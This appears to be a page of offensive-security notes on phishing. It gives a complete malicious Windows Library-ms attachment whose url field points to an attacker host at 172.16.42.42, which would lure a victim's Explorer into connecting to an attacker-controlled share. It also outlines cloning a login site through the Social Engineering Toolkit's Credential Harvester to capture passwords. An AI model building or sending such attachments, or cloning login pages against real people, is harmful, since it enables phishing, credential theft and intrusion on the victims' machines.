Phising

Attachment

Create a malicious attachment (config.Library-ms) and include the attacker host's IP address within the <url> tags (line 15):

circle-exclamation
config.Library-ms
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>http://172.16.42.42</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>

Site Clone

circle-exclamation
chevron-rightExample HTML code for a login page which can be hosted on Apache2 for set to clone:hashtag

The Social Engineering Toolkitarrow-up-right can be used to automate the process:

We can manually run setoolkit and select the options Social-Engineering AttacksWebsite Attack Vectors > Credential Harvester Attack > Site Cloner.

We can also the above choices and required input using seautomate:

Last updated